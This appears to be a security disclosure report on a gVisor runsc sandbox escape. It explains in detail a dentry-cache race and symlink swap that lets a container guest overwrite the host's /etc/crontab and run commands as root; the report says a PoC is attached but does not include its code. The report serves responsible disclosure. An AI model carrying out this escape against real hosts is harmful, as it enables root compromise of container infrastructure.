gVisor runsc guest->host breakout via filesystem cache desync The following writeup describes an attack that can be used to overwrite files in the host filesystem (/etc/crontab in my PoC) from inside a Docker container that uses gVisor's runsc. I tested using a gVisor build from https://storage.googleapis.com/gvisor/releases/nightly/latest/runsc , with "--platform=kvm", on Debian Stretch; and also with a custom build based on the master branch, with some extra logging. gVisor emulates a lot of syscalls in a seccomp-sandboxed host userspace process. One of the most interesting sets of syscalls is gVisor's VFS implementation because it uses the host's filesystem as backing storage, allowing the guest to, for example, create arbitrarily-named files, directories and symlinks under the directory used as backing storage. The seccomp-sandboxed host userspace process can't directly access the host filesystem; therefore, UNIX domain sockets are used to talk to an unsandboxed helper, using a protocol that seems to be vaguely based on the Plan 9 Filesystem Protocol. For most host filesystem accesses, the unsandboxed helper process (implemented in runsc/fsgofer/fsgofer.go) uses careful manual O_NOFOLLOW/AT_SYMLINK_NOFOLLOW accesses. However, as a comment correctly explains, there are also places that improperly just use filesystem syscalls with full paths instead of the *at() family: // TODO: hostPath is not safe to use as path needs to be walked // everytime (and can change underneath us). Remove all usages. hostPath string These places are: - Open() if LazyOpenForWrite is active and write access is requested - SetAttr() if LazyOpenForWrite is active - SetAttr() with ATime/MTime if the target is a symlink - Rename() I'm going to focus on Open() with LazyOpenForWrite in this writeup. In an environment where LazyOpenForWrite isn't set, Rename() would probably also have a good chance of being exploitable. Exploitation of this bug from the seccomp-sandboxed host process would probably be rather simple, since the unsandboxed helper makes no attempt to prevent the sandboxed host process from forcing a cache desynchronization: - create a directory "root" at the root, open it as handle A (hostPath="{...}/root") - create a directory "etc" at handle A, open it has handle B (hostPath="{...}/root/etc") - at the root, move "root" to "root_". note that this doesn't change the hostPath of handle B! now the filesystem cache in the unsandboxed helper is desynchronized. - at the root, create a symlink named "root" that points to "/". at this point, the hostPath of handle B contains a symlink as a non-last component. - open "crontab" at handle B for writing However, an attack from the sandboxed helper process is rather uninteresting - an attack from inside the sandboxed guest would be much more interesting. What makes an attack from inside a guest harder is that the VFS layer in the sandboxed helper process attempts to ensure consistency between its dentry cache, the hostPaths in the unsandboxed helper, and the host filesystem. In particular, when a directory is being renamed, Rename() in dirent.go calls Busy() to flush out all dentries under the renamee; if that is not possible because one of the dentries is active, rename() fails with -EBUSY. But there is a race condition that can be abused to desynchronize the dentry cache of the sandboxed helper such that two dentries refer to the same backing file: If a directory is looked up by the path walk code (Dirent::walk()) while simultaneously being moved (Rename()), it can happen that the lookup creates a positive dentry under the old name. Rename() holds mutexes (`.mu`) on the old and new parent of the renamee, and Dirent::walk() is also invoked with the `.mu` mutex held on the directory under which a lookup is performed, so at first, this might look implausible. However, when Dirent::walk() is invoked with walkMayUnlock==true, the lookup slowpath can temporarily drop the mutex: // Slow path: load the InodeOperations into memory. Since this is a hot path and the lookup may be expensive, // if possible release the lock and re-acquire it. if walkMayUnlock { d.mu.Unlock() } c, err := d.Inode.Lookup(ctx, name) if walkMayUnlock { d.mu.Lock() } The lookup slowpath then attempts to account for possible races by checking whether the parent now has a child named `name`; however, in a race with Rename(), the other child may have already been moved to another name. To trigger this, my PoC does the following: - create a working directory for the attack and chdir() into it - mkdir("old_") - create a file "old_/file" - rename "old_" to "old"; this forces the dentry for "old_/file" to be flushed via .Busy(), which in turn causes the dentry for "old_" / "old" to no longer have any strong references; therefore, after rename, the dentry disappears - perform the following two operations in parallel: - open "old" as `dirfd`, with O_PATH - rename "old" to "new" - verify that the race was successful by attempting to open "{dirfd}/file" for writing. if the race was successful, this will fail with -ENOENT. When successful, the race works as follows (debug output from gvisor patched to add extra logging; the pointer is the address of `ctx`; manually added indent to show which context a line is for): W0809 19:11:28.456815 1 x:0] Rename-0xc4200c2900 entry for "old" => "new" W0809 19:11:28.457042 1 x:0] walk-0xc4200c2000 for "old" looking for child W0809 19:11:28.457071 1 x:0] walk-0xc4200c2000 for "old" found child ref W0809 19:11:28.457097 1 x:0] walk-0xc4200c2000 for "old" dropping lock W0809 19:11:28.457212 1 x:0] Rename-0xc4200c2900 "old" => "new" has locked parent(s) W0809 19:11:28.457235 1 x:0] walk-0xc4200c2900 for "old" looking for child W0809 19:11:28.457657 1 x:0] walk-0xc4200c2900 for "new" looking for child W0809 19:11:28.457713 1 x:0] walk-0xc4200c2900 for "new" found child ref W0809 19:11:28.457754 1 x:0] walk-0xc4200c2900 for "new" found hard child ref W0809 19:11:28.458050 1 x:0] Rename-0xc4200c2900 removing old child "old" W0809 19:11:28.458115 1 x:0] Rename-0xc4200c2900 inserting new child "new" W0809 19:11:28.458204 1 x:0] walk-0xc4200c2000 for "old" retook lock As you can see, the walk performed for context 0xc4200c2000 encounters the weak reference for "old", removes it, then drops the lock while doing the actual lookup; context 0xc4200c2900 grabs the lock for the rename and performs the entire rename; then context, 0xc4200c2000, which performed a successful lookup and was waiting on the lock, retakes the lock and validates that no children named "old" exist 'yet'. At this point, the method got_enoent() in my PoC executes. It creates the directories "new/subdir" and "new/subdir/etc" as well as a file "new/subdir/etc/crontab", to which a writable reference will exist at this point. It then flushes the dentry for "new/subdir/etc/crontab" by renaming "new/subdir/etc" back and forth; this gets rid of the writable reference. Afterwards, "new/subdir/etc/crontab" is opened with O_RDONLY - this time creating only a readonly reference. Next, an O_PATH fd to "new/subdir/etc" is created, stored as `etc_fd`. So far, all actions in "new/" have been through a single, consistent view. But now, `dirfd` is used to swap out the newly-created directory structure while the normal view has active references to it: "{dirfd}/subdir/etc/crontab", "{dirfd}/subdir/etc" and "{dirfd}/subdir" are removed; then a symlink pointing to "/" is placed at "{dirfd}/subdir". From now on, when the unsandboxed helper attempts to access `etc_fd` using the full pathname, it will actually follow a symlink and land at the host's "/etc". Next, "{etc_fd}/crontab" is opened for writing and attacker-controlled data is written into it, then fsync()ed; this causes the unsandboxed helper to open the host's real /etc/crontab and write attacker-controlled data into it. I have attached the PoC as gvisor_swizzle_poc.c. To run it, create a Docker container running Ubuntu, as in the gvisor README ("docker run --runtime=runsc -it ubuntu /bin/bash"), then compile and run the PoC in there. Afterwards, you should see that /etc/crontab on the host has been overwritten; and after about a minute, output from `id` running as root should show up in "/tmp/pwned" on the host. This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public. Found by: jannh